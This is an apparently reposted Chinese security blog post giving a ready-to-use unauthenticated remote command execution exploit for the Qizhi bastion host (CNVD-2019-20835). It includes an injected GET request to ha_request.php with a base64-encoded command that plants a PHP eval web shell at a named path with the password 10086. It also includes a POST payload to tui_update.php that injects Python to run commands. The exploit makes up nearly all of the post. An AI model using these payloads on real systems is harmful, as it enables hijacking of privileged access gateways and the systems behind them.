齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)

admin 2022年1月6日01:14:21安全博客评论15 views576字阅读1分55秒阅读模式

齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835

未授权无需登录。

1、访问 http://10.20.10.11/listener/cluster_manage.php :返回 “OK”.

2、访问如下链接即可getshell,执行成功后,生成PHP一句话马

3、/var/www/shterm/resources/qrcode/lbj77.php 密码10086

1
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}

image-20200913015044393

这里假设10.20.10.10为堡垒机的IP地址。

另外一个版本是java的。

POST /shterm/listener/tui_update.php

a=[“t’;import os;os.popen(‘whoami’)#”]

image-20200915094059411

FROM :ol4three.com | Author:ol4three

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:14:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835) http://cn-sec.com/archives/721515.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: